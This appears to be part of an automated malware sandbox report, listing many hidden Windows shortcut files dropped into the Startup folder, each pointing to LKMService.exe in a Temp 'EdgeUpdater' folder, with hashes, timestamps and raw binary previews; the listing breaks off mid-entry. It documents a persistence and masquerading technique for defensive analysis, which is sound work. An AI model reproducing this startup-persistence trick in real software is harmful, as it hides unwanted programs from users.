H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_75bc3afdb6384591b03d648ecbb02287.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:18 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937963265326578
Encrypted:	false
SSDEEP:	24:82VRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8IJD3lfAvRAt41vgHyg
MD5:	35AA3C92E28D4E4E380D5E11B939FE2A
SHA1:	2F418F20F31C83F2B4C73EA41CA672AF5354FF4F
SHA-256:	0D43754B11DFC9D400EA4F67DD5A6B69911FA9BCDB005406273F6105164712E6
SHA-512:	2D7F71E8EDE941C764028285D43F1BDCA33F1FF66B15E427B4F3606764025AD8B8F904B93F1C09717B7B9A8749D81C02B3B91A84235F3D3683BA15EDC3BF7885
Malicious:	false
Preview:	L..................F....".....X:3....4.b3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7a283f2dc44047f9b90f76f7687c84db.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:12 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940092326785316
Encrypted:	false
SSDEEP:	24:8yRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:80JD3lfAvRAt41vgHyg
MD5:	D269270B4D66111A4B8DD7A4101A5D57
SHA1:	1551CBC89D89FF95578681891B3990EB107D1EFB
SHA-256:	683D5AD41C88755BCD0C9713642A4A4C19F8AEC8E74B571BC757B4460596B8AE
SHA-512:	A07B88AB60BAB6D388C61A74449284877EED3815B364CFF10872149630B474306FFCA3ED0F007B961671C4FF16186FF45FA64589B042C9A0926F4B5FC85A733A
Malicious:	false
Preview:	L..................F....".....X:3..."=.;3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b11985b0f4a44efbcfa9ebcdda85610.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:29 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.933574856165677
Encrypted:	false
SSDEEP:	24:8SRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8UJD3lfAvRAt41vgHyg
MD5:	23F103ADEBEA8296606ACF71E07AD190
SHA1:	0AD84ABFA47A03B4B30F86EEF9B101AFE3942818
SHA-256:	A4315B96E3481BA5258A6C01342A365345C5250FE602B207E529C6556A646BC7
SHA-512:	1F4C29AA887940B2A2F70386C82D87755228B5AF0D15E4A98A6D2C32338D40AC06E7BA61D3C9FF5D59C42DA170035B9D62198F7FDFFD57405E9B0F7AD1A22C74
Malicious:	false
Preview:	L..................F....".....X:3.....pE3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7d29b77eb5544048bf84a48c0bc966be.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:43 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.939763741326085
Encrypted:	false
SSDEEP:	24:8wERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8BJD3lfAvRAt41vgHyg
MD5:	B4468AE9DB42B07DB1A0CF0DA89F9C62
SHA1:	DE8B8803C56ABF09CCDBB0866DF11E65E30A72DC
SHA-256:	2F680AA33CD09B35A2EC2A8D556A822CE3C303ECDB4DA3D65C216EC8F197427C
SHA-512:	3D946F6643478069B3E3AB133392BEACCEA6327E607429C2499B35976C7C5A224954C295208AF5E1DB5424357F533099568942E9F757B437CB32A80AA1E82DE2
Malicious:	false
Preview:	L..................F....".....X:3.....M3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7e8ecf4f001c41edb4100bd58d1d004f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:15 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.944730184533066
Encrypted:	false
SSDEEP:	24:8F6RJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8FMJD3lfAvRAt41vgHyg
MD5:	7174EA0848616D74191C2958042D38BA
SHA1:	FB969F86F2AE5B1BA56535AD800DA5BAAB7E034E
SHA-256:	CAD1439D71AB1DFC573E8357D04F7D577584474EB927EF03B576A520D5CBFAD2
SHA-512:	0A5F4F0AC3186F007750D748B04D19B257A9EA16D241D57BED0C12ACE285CFE8C487A2E845379882233A0E5D63EC2470FCCFA1F94AA0A46158F37598C75DBF34
Malicious:	false
Preview:	L..................F....".....X:3...;.)=3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_80b58aa1ecd34f41b1ed729e00929f51.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.941691766625291
Encrypted:	false
SSDEEP:	24:8vRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8pJD3lfAvRAt41vgHyg
MD5:	28BA6F4B51CCF9600C441CCF066EF54E
SHA1:	5F3AF6C483767D550DA5B37678D3C4D4433D29B4
SHA-256:	A0F5B2944172A961E3E3736BD58CAAD102EA18998D2D1780BE907ED054550134
SHA-512:	66567EF994C101A90B592A42053EED7EFCBAADA0535CEFA7A52E506EA66E9C4394AEC0BC2E8B470DA259BF4B16B6587D30D6FD52451B48821D77FEDAE96CB758
Malicious:	false
Preview:	L..................F....".....X:3......^3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8127c9e300df4816a3f8c0b347934bf0.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:34 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.938750889038317
Encrypted:	false
SSDEEP:	24:8IERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8ICJD3lfAvRAt41vgHyg
MD5:	16EF18D930C99E048A749CD415956AF6
SHA1:	CE67C65DA063F2FD366B364DA963F440ECE5DCA1
SHA-256:	CEF2774B3FB4D034FE73B39580704D7868732A7D8C6EDAA46B01C4CA11E98F2B
SHA-512:	B891F218AE99AEED4D8E86290FF0E3D1943F2BDC3CD9425CBFFE685A3075006D95075F9ACFAADB91F28100613A65EDF041061D8F7D554F5B788278C7D2F14E10
Malicious:	false
Preview:	L..................F....".....X:3....H3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_856eb967065a4a3faa5cc998ae92f005.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:32 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.93241605112979
Encrypted:	false
SSDEEP:	24:8uRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8oJD3lfAvRAt41vgHyg
MD5:	B4819230FEC02E6CE11EF0DCD51C6CCB
SHA1:	7086511763AF7AD77B4764485A6802737BFA9DF4
SHA-256:	333991E61BAAACF958B69801D24304434900B77D9429EF5D79371D874997A73D
SHA-512:	A6EB1437ED8B864841B363B42893F45798C269F2CBD734B6F09EBA84C0043A0BB2BBF1A4AEECACB156933AD8C524A7C70C404FA197A483638339208864C71584
Malicious:	false
Preview:	L..................F....".....X:3...K.KG3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_88f655959b0548ed994a963bf2f1d4d9.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:10 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940092326785315
Encrypted:	false
SSDEEP:	24:8GRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8QJD3lfAvRAt41vgHyg
MD5:	14C0956BDEA8CA41E37F4C543CD71171
SHA1:	A04227FA9B37A6D1876F0E611F5FF51BE1059E8A
SHA-256:	F1C57531532D81568202C1EB03A1C530E3713DC1B804D48FBB85FD6D2F3F30AF
SHA-512:	E7E0C3E9C48C2175FAC90ADF6C79E387A1BBFC60F1FA2398A210541D99A91723B5BAC7EE8EB4455295AD823BE514CE42339C36D29EB6675D7EB7A2B967480C07
Malicious:	false
Preview:	L..................F....".....X:3......]3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8b0b963caf834d029f35df17c1c436c7.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:11 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.933770967354062
Encrypted:	false
SSDEEP:	24:8TRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:81JD3lfAvRAt41vgHyg
MD5:	1C4C249472F5E4121293DFC9A4698BDE
SHA1:	E48B5DD43E1B2175C2D83789A4AC0386BFE63001
SHA-256:	48E370F005FE332B6526645F9A3A5D3E12CC8152FDFFC92C21CE182F2234D999
SHA-512:	C31F4B49DB0E0A2FFEF3E8714328A26C77FCC598008F13D9191C17F9BF49A1664CAFBA9D9478988C784E997A9BED1EB5FD3B236F73459AA179E273BD49E9069D
Malicious:	false
Preview:	L..................F....".....X:3....:3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8f3c4b00bddc456e9c6e890ed0339b68.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:53 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.940608469926803
Encrypted:	false
SSDEEP:	24:8uRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8oJD3lfAvRAt41vgHyg
MD5:	5DDFB2EAB155DAE04E55FBB1C5723381
SHA1:	BF8D1E84B43015246E510CD3D970466A12363B58
SHA-256:	AB55C98E15DAAB4E0CAA8A7F821EE434C53D340F1AA1F3D4E7DD5D41D4A03498
SHA-512:	C6AC45D86E0B44140DE45A4D3D9DFBB11F4EAA6AA89DA2CFB20068475A616721A06E301F24230B5C69CAB79A994B97E6237311A8AB72F2F775F8250E29D2DC8E
Malicious:	false
Preview:	L..................F....".....X:3...\|..T3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_92fa881b504c497db058025dd6cb3bc4.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:50 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.936962612329988
Encrypted:	false
SSDEEP:	24:8SRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8UJD3lfAvRAt41vgHyg
MD5:	6FC67136A5511DBC21969A1C8FD6C5B7
SHA1:	281368CE5839B380F99A47C25EF062153F49EA4A
SHA-256:	296C69B40F945CD1CA215B880B4B617F902104F68E50E62500C0435E7D62E787
SHA-512:	7ADB026C7F4D615D8655D86BE26512CCA8ECA561A30E10DB02C6A1E886475E2374379816499FCFAB53501A5342F449BB6A9D59AFD39DA2BEDE3CBC79891AE224
Malicious:	false
Preview:	L..................F....".....X:3.....2R3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9dac438bfec04a60812adddf7761318f.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:27:02 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.937949647893768
Encrypted:	false
SSDEEP:	24:8TRJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:81JD3lfAvRAt41vgHyg
MD5:	B22CCF6CE6B8FFAF8D4D3B01B7FD5C9F
SHA1:	CC969B9789B8106D20F8743E1F3392386FA0E766
SHA-256:	FE5B1241834328F6575D47B945001BFD0B73EDAD73D17A129FBB00121A3ADCA4
SHA-512:	2B0695FA1A7D8AA4D02B20B25D97BA8D02F39401F8D6D6165A2F48DB3336E309F5A3CF5BF72503803FBDA31962E062C089055030DFC36146A887994C8718FDCA
Malicious:	false
Preview:	L..................F....".....X:3....>.Y3...<..93...........................&.:..DG..Yr?.D..U..k0.&...&.......$..S....G.53...\|H.:3.......t...CFSF..1.....EW<2..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW<2CYD............................^.A.p.p.D.a.t.a...B.P.1.....CYB...Local.<......EW<2CYD.....[........................L.o.c.a.l.....N.1.....CYF...Temp..:......EW<2CYF.....^.....................BS..T.e.m.p.....`.1.....CYF...EDGEUP~1..H......CYF.CYF...............................E.d.g.e.U.p.d.a.t.e.r.....j.2.....CYE.".LKMSER~1.EXE..N......CYF.CYF.............................^.L.K.M.S.e.r.v.i.c.e...e.x.e.......n...............-.......m...........K.c_.....C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe..7.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.E.d.g.e.U.p.d.a.t.e.r.\.L.K.M.S.e.r.v.i.c.e...e.x.e.........\|....I.J.H..K..:...`.......X.......424505...........hT..CrF.f4... ....Jc...-...-$..hT..CrF.f4... ....Jc...-...-$.............1SPS.XF.L8C..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9e92297ac52847c3a122730984e5abd1.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Hidden, Archive, ctime=Thu Oct 3 00:26:10 2024, mtime=Thu Oct 3 00:26:16 2024, atime=Thu Oct 3 00:26:09 2024, length=243888, window=hide
Category:	dropped
Size (bytes):	1188
Entropy (8bit):	4.9381299708720015
Encrypted:	false
SSDEEP:	24:8PERJD3lXPXQvRXgK4ntKSAwav/42eMKUBqygm:8PCJD3lfAvRAt41vgHyg
MD5:	DEF817AB6D09E63C7A5844FD007B4F50
SHA1:	35C251A228EAC11DCBA50F7E3A7315A48CC14860
